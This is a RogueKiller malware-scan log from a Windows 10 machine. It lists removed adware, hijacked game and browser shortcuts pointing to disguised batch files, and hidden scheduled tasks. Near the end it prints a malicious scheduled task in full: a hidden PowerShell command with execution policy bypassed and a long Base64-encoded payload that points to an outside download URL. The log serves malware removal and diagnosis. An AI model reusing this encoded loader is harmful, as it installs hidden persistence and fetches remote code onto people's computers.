[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {8DA09001-13CD-4F60-A499-697A1D88A246} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Deleted
 
¤¤¤ Tasks : 1 ¤¤¤
[PUP.Gen1] \ACC -- C:\Program Files\DriverSetupUtility\FUB\FUB_Send.bat -> Deleted
 
¤¤¤ Files : 30 ¤¤¤
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\G??gle Chr?me.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\G?ogl? Chrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-file-l1-2-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-file-l2-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-handle-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-heap-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-interlocked-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-libraryloader-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-localization-l1-2-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-memory-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-namedpipe-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-processenvironment-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-processthreads-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-processthreads-l1-1-1.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-profile-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-rtlsupport-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-string-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-synch-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-synch-l1-2-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-sysinfo-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-timezone-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-util-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-conio-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-convert-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-environment-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-filesystem-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-heap-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-locale-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-math-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-multibyte-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-private-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-process-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-runtime-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-stdio-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-string-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-time-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-utility-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\d3dcompiler_47.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\msvcp120.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\msvcp140.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\msvcr120.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\ucrtbase.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\vcruntime140.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\G?ogl? ?hrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MU LEGEND GLOBAL\?U LEGEND GLO?AL.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft\W?rld ?f W?rcr?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Deleted
[PUP.Gen0][File] C:\$RECYCLE.BIN\S-1-5-21-3446151218-491997262-3667861278-1001\$RUYU978\??th of Diablo Laun?h?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Removed at reboot [2]
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
 
Scan #2

 

RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 11/20/2017 23:51:38 (Duration : 00:18:37)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Found
 
¤¤¤ Tasks : 7 ¤¤¤
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-AK -- C:\Users\Jpoch\AppData\Local\9473901e0c7844098f532bfef236bee4\chipset.exe exec hide XPICSBNYDO.cmd -> Found
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-IJ -- C:\Users\Jpoch\AppData\Local\afeada034889495fb73c9f8c3f354641\chipset.exe exec hide XZOQWMCMVN.cmd -> Found
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-LR -- C:\ProgramData\6e6cc0af64b54b7891a16a888cd366e7\chipset.exe exec hide JPRLEYTJHS.cmd -> Found
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-YT -- C:\ProgramData\3c405015f0eb4fae8b5f3139c2328bd8\chipset.exe exec hide QPEZNPALYH.cmd -> Found
[Adw.Optimizer] \SPACE(TITLE, T_DELAYED) -- "C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe" (-scan) -> Found
[Adw.Optimizer] \SPACE(TITLE, T_MONITOR) -- "C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe" (-Notify) -> Found
[Mal.Powershell] \{0D050A47-0404-0C0B-7E11-78057E7D117D} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABQAFUAWABWAF8ASQBaAE8AWABPAEEAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAIAB9AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAIAB9ADsAfQAKAH0AUABVAFgAVgBfAEkAWgBPAFgATwBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFAAVQBYAFYAXwBJAFoATwBYAE8AQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFAAVQBYAFYAXwBJAFoATwBYAE8AQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQAYQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbAA9ACIAaAB0AHQAcAA6AC8ALwB0AGEAYgBsAGUAegBpAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHcAaQA0AEMANAB3ADIASgB2ADAAUgBZAFQALQB5AEUAeQA2AEUAQgBvAGUAMgBkAEwARwBiADAAMwBHAFcAZABwAFkANwBlAC0AbwA0AFAAWQBfAGwAZABKAGsAbwBCADMAUgBVAGgATAB3AE8AXwByAC0ASgB4AGMAegBzADkAZQBhAGsALQBMAG0AOABBAGoAVABOAHoARABLADMAcQBSAG4AaQBHADYAMQBkAGQAdQA2ADAAcwBSAGQARgB3AEYAYQBkAFUAOAA3AFoAOQA4AGkAMwBZAEUATwBvAGQAWQB4ADQAbABmAGIAVgB4ADYAUAA3AHAAdABMAFcARAAxAHQANgBqADIAUwBKAFEAUQBHAHMAVwBIAHoAQwBoAHMAcgBrAHAAcQBzAGcAWQA3AFQAUwA1AFoAawA4AGMAWgBNAEcAbwB0AE0AMQA4AEkANABIAGoAcABIAEwAYgBoAGIASgBSAGYAOQA4AEQAOQA5AHAARwA3AEIAWgBYAGsAZwB5AGcALQBQAGcAcAAyAEUASwBwADMAUQBWAGUAMwBDAEgAeABjAFQAbABxAFQAUgBrAFoAOQA4AEwAegBTADIAZgByAFUAawBTAGUAZABPADIARwBSAHgAWQA0AGwAYQBQAEQAdABFAFIAWgBpAHMAcAB2AEMAQgBBAEkAOABGAEIAUABCAEkANwA0AGwAbgA2AGoATgBZADgAcABZAFEATQBaAE8AdwBMAEQAMgBhAHgAZABYAEYAWgBVAE8AUABHAFUATwBtAFgANwBxAHQAeABkAGUAQgBHAHoAQQA1AGIAbwBLAFcARgBaAFQAbABwAE4ARgA0AGMAegBVADIAUQBEAEwAZgBUAFMAZAAyAFIAQgBTADYAWgBPAGMAagAwAE4AUgBzAGUANgBpAE0AawByADIARQBwAEoAbQBNAFoAOAAtAGoAdABOAHgANQAzAEgAUQBFAEcAagBCAFMAcgBpADUAVwA5AHMAQgBZADgAUAB3AGIANQAyADMAawBlAGMANgB0AEoANABlAEoAdwBqAE8AVAAyADAAZABCAEkAZABzAEQAcAB4AHcATABlAFMAMQBtADAAcgBkAGYANgBYAFkAMgBLAG4AVABCAEMATwAwADQATQAtAC0AYQAwAHAAUABJAGIAMwA0AG0AcABsADEAQgBvAGkAZwBUADMARgA3AGwAbwBzADcANQBmAGEAQwBRAHQARwBmADYAUABrAGgAMgB5AHMAMwBiAGQASQBzADIATwAyADUAVwA0AGEAVABQAFgAMQBzAE4AUgBlADAAcQAxAHcAdwB1ADgAcAA3AC0ARQBxAG8ARgBXAEYAVQBNADgAcwBFAEwAeABtADEAMQBPAHoAZwBDADYASQBQAEYAOABPAFgAVQBuAGYARQAzAHkAZgBlAFkAMwAwAG8AdABmAEoASgBVAE0AWgBpAGQAWABYAHcASwBFAF8AMgBUAEsAQgBqAGIASQBRAEEANgAzAHcAMgBPAEMASgBRAEUAUgBBAEoAdQBnADQAaQBTAHEAZwBYADMARAAwADgAeAAxAHYAcwBWAEUAegBEAGQATgBEADQAbgBWAGgAZAAzAG4ASQBfAFQAMwB2AFoAQQBpADkASABQADUAegBxAHYAQwBoADYAWABTADQAYwBQADgARQAwAEgAUQBxAHgAMgBlAGQAOQB1AEgAOQA3AGMAQgBhAF8ASgBNAG8AQwBrAGgAdABpAEEAcABEAE8AbwBXAEQAZABhAE8AVwBWADgAUABlAGQAVwBRAFYAMwBQADgASgBYAEoAOAB6AHQAMwBJAFoANgBYADQAdQBmADcAWgBoAEkAdwBlAFUAcwB0AHQASwBhADMAMwBBAEEAYwBBAG4AcABPAGoAdwBhAFoANgBIAF8AOAA0AGYAawBzAF8ARgBvAE8AaABBAEwAOQA4AHgASgBKAEwAMwBzAHIAaABFAHAAZQBxAFcAVwBtAGUATQBRAEcAdgA1AFoAcQAwAG0AawBaAHYAWABjAGIAXwBmAEUAWABUAGEAbwAwADEAOQByAFAAagA0AGwAVQBRAEIAbABKAFUAWQA5AHUAeABjADEAbgBhAGUAaABPAGsAOABMAHUAQwB0AHAAQQBUADUAdQBXADkAcABqADEAOABtADAAYgBIAGgAcwBEAHgAUABDAEIAZQA5AGoAVQBKAE0AdQBVAEQAYgBYAEIAZAAzAE0AcgBzAFcAVABXAEcAZAB4AHcATwBaAHoAYgBvAHgAbgBfAHUANABkAE0AawBLAHoAOABPADIAbQBmAGIARAA3AEYAaQAwAFEAWgBCAEMAZQA0AFUAYwBjAEYAMgBIAEgARABTADQAeQBQADMAbABhAGoAQQBnAFYAUwBtAG0AMwBLAFcAZwBhAEEAcABEAEEANQA3ADAANgB3AFoARQBnAGYASwBCAFIAbABBAE0AMQBCAEIAYgB3AFUAZwBJAEUAUQBfAFgAegBSADQAagBoADYAUQB6AGcAUQAzAEQATABmADEANwB5AFAAMgBjADkAVgBvAFIAZwAyAG4AOABfAGkAMABaAEEAXwBkAHkAXwBwAGoAdgBEAHUALQBNAHUAcQBTAHEAeQB1AF8ARAB3AEwAOAAtAGQAOABiAGcAUABWAHUARwB4AFIAMgBlAEIAagBlAGIAVABlAHkARwBHADMAMgBUADkAUwBFAFAAQwBJAGMAdQAwAHcAdQBOAFEAQwBOAGYAOQBnAC0AJgBjAD0AcgBPAF8AYwB3ADgATQBSAEMARQBzAFMAYwBKAEQAdQBzAE0AagBzAFkALQBKAGYAbABVADgAMABiADQARQAtAHoARgA1AFoAZgBzAE8ASAAzAE8AUABrADQAZwBQAEgANwBxAHAASABjAE0AQwBCAGkAUAA1AC0ARwBnAHYAaQBBAFEATABoAHEAWQBnADEATgBVAFAARQBGAFEAUQBCAHYARgBJAGkAZQB4AEoAcgB5ADQAZgBDADUAOQBRAGUAbwBQAHMAQgBRAGIAZQBTAEMAQgBNAHUAaQBTAGsAZgBkAGwARQBxAHkAQgB0AEEAcgBuAG0AbABFADYAZAA3AEgAdgBWAGwATABQAFoAdwBiAEcAZgBCAGYANABRAEwATQAwAHIAUQB3ADUAUwBGAG8ASQBFADEASQBZAEMATABNAHgANABnAHQAcwBvAFcAZgA2AFYAWgB6AHMARgBpAE0AawBSADIAegBOAFUAcwBUADYAdABUAEEAdABmAG4ANwBYAFEAdwB5ADcAagBpAHAAOQBCAFAAdwAwADcAXwBBADYAdgBJAGwASABUAHUAcQBFAFEAawBkADUAeABrAFUAUQAtAHcAQQAwAEUARABLAEUAUwBhADkAcwAyADYAYgBUAFQAVwA4AFoAYQBqAEcAegBJAG0AUwBFADIAWQBqADEAUAA3AGkAagBqAEsAQwB1AFQAbgA0AHMAXwA3AHoANABXAEoATAA5AE8AZAB5AHEARwBvAFAAaAA0AC0ASAB1AEMAcgBsAGkAWgBpAGIANgBFADEARwAzAGYANwBvAFUAZwB3AE8ATABRADUANwBoAHoATABkAGoAcwBZAFAASAAwAGIAXwBJAGkAYwBKAFAAZABMAGsAbABmADEATgBZAGYAOQAyAC0ALQBuAEEAYwBXAFcAeAB6AC0AQQBKAHoAZABNAG0ARgB6AHYASgAtAEcAdgAzAEgAVABSADkAeQBNAGMAWQBTAHIAeQBkAEYAVQA5AGEARABYADYASgBBAGkARABaADUAbwBEAGIAXwB0AEkAbgB2AE0AUQBfAGsARQBhAEcAMwB3AHUAcQBzADEAcgBIADMAMQB0AGsARgBiAFEAOABIAF8AQwBJAEYAWABPAFIARAA4AEcANQBhADIAdQBZAFUAeQAyAHcAdwA1AFEARwBQAEMATwBfADQAZQBfAEkAZgB2AGMALQB3ADgAZABFAFUARQBDAFUAQwBJAEwAaQAxAHoANQBrADEAcABfAGwAZwBBAHAAeQBqAGMAYwBiAHoAWQBTAEEAWQBqADEAegA0ADEARQBOAF8AbwAwAHcAaQB6AE0AWgBnADgAMgBkAGcAOABBAGgAYwBBAHcARgA0AGkARwBzAF8ASgB5AEQAUwBQADEAWQBYAEgATwB3AEsAZAB6AFQAQwB6ADEAVAA2AHgAMgBOAEkAQQBMAFYASgBTAEkAbgBDAHYATgBBADYAaQBLAG8AXwBOAE4AagBhAFYAbwBsAFoAVQBPADAAVQBwAEMAbQB2AC0AMgBLAGgAUwBQAHUAMgBWAEoAOABIAEQAbgBMAG4ANABiAEIASgB3AFcAVgBpAEwAcABKAFIAVgBjAEMARABUAEoAaQBWAEgAZwBmAGIASABTAEEARABKAHIAcwBRAGoARQBnAGgAYQBQAE4AegBPADEAeQA1AHEAegBGAHEAUAB4AFkAUQBzAE4ANwBuAHEAVwBDAFgAbwBRAFYATQB4ADUAOABIADEAVwBSAE0ASQB1AGwAegBZAGEARwBHAG8AUABHAHUAWQBvAHkANQBZAG0AMQBOAG4AYQB2AEQANgBKAFgAMABnAGgAMwBJAHYAdgBZAG8AVgBnAGgATwBMADcAUQBxAEMAcwBrAEwAOQBzAEsAbwAxAFUAdwBBAE4ARgBVAHIAcABNAGwAMwAzAEwAbwBXADMAeQB0AHgAegBOAGEAQwBtAEMANABIAC0AMABrAEsAUgB3AGoARQBSAGQASABOAGkAcAAxAHAATAB1AEwASwBsADkAYwBJAG4AbQAxAFoAQwA2AEwAdAA0AGwAOABxADgAQQBMAEsATABCADEAcgAyAFoASAAzAHYAVABQAEYAQgBnADcAOABiAEQAZwBmAFAASAAwAEMAWgBDAHMARwBXAGsAMgBPAGwAMQBzAFMAQQAxAEgARgBvAHkAawBDADEAcwBUAG0ARgAwAEIAMQB6AEEAUABHADYAegBkAGgASgAw